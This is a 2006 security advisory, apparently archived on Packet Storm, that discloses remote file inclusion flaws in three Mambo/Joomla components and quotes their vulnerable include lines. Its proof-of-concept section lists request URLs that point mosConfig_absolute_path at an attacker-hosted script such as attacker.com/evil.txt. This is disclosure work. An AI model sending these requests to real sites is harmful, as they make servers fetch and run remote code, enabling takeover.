exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Echo Security Advisory 2006.38

Echo Security Advisory 2006.38
Posted Jul 14, 2006
Authored by Echo Security, Matdhule | Site advisories.echo.or.id

[ECHO_ADV_38$2006] - Multiple Mambo/Joomla Component Remote File Include Vulnerabilities.

tags | advisory, remote, vulnerability
SHA-256 | 92d62accaf4f82fcd91e14a02809a57acde0a0ffce5e366daa06154fb31116b3

Echo Security Advisory 2006.38

Change Mirror Download
ECHO_ADV_38$2006

-----------------------------------------------------------------------------------------------

[ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include Vulnerabilities
-----------------------------------------------------------------------------------------------


Author : Ahmad Maulana a.k.a Matdhule
Date : July 12th 2006
Location : Indonesia, Jakarta
Web : http://advisories.echo.or.id/adv/adv38-matdhule-2006.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
------------------------------------------------------------------------


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Hashcash Component

Application : com_hashcash Component
version : 1.2.1
URL : http://developer.joomla.org/sf/frs/do/viewRelease/projects.com_hashcash/frs.components.com_hashcash

# HTMLArea3 addon - ImageManager

Application : HTMLArea3 addon - ImageManager
Version : 1.5
URL :

# Sitemap 2.0.0 for Mambo 4.5.1 CMS

Application : Sitemap 2.0.0 for Mambo 4.5.1 CMS
Version : Sitemap 2.0.0
URL : http://mamboxchange.com/frs/download.php/6463/sitemap20.zip

------------------------------------------------------------------------


Vulnerability:
~~~~~~~~~~~~~~

# Hashcash Component

In folder com_hashcash we found vulnerability script server.php.

-----------------------server.php---------------------------------------
<?php
include($mosConfig_absolute_path."/administrator/components/com_hashcash/config.hashcash.php");
require_once ($mosConfig_absolute_path.'/components/com_hashcash/CryptoStrategy.php');
...................

------------------------------------------------------------------------

# HTMLArea3 addon - ImageManager


In folder ImageManager we found vulnerability script config.inc.php.

-----------------------config.inc.php-----------------------------------
<?php
// $Id: config.inc.php, v 1.5 2004/06/03 17:35:27 bpfeifer Exp $
/**
* HTMLArea3 addon - ImageManager
* Based on Wei Zhuo's ImageManager
* @package Mambo Open Source
* @Copyright 2004 Bernhard Pfeifer aka novocaine
* @ All rights reserved
* @ Released under GNU/GPL License : http://www.gnu.org/copyleft/gpl.html
* @version $Revision: 1.5 $
**/

require($mosConfig_absolute_path."/administrator/components/com_htmlarea3_xtd-c/config.htmlarea3_xtd-c.php");

------------------------------------------------------------------------

# Sitemap 2.0.0 for Mambo 4.5.1 CMS

In folder com_sitemap we found vulnerability script sitemap.xml.php.

-----------------------sitemap.xml.php----------------------
<?php

/**
* XML/XHTML menu system
* @package Mambo_4.5.1
* @copyright (C) 2000 - 2004 Miro International Pty Ltd
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
* Mambo is Free Software
* Author : Johan Janssens - johan@jinx.be (http://www.jinx.be)
**/

// XML library
require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );

------------------------------------------------------------

Variables $mosConfig_absolute_path are not properly sanitized. When
register_globals=on
and allow_fopenurl=on an attacker can exploit this vulnerability with a
simple php injection script.

Proof Of Concept:
~~~~~~~~~~~~~~~

http://[target]/[path]/components/com_hashcash/server.php?mosConfig_absolute_path=http://attacker.com/evil.txt?
http://[target]/[path]/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://evilscript
http://[target]/[path]/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://attacker.com/evil.txt?

Solution:
~~~~~~~

sanitize variabel $mosConfig_absolute_path.


------------------------------------------------------------------------
---
Shoutz:
~~~~~
~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~~~

matdhule[at]gmail[dot]com

-------------------------------- [ EOF ]----------------------------------

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close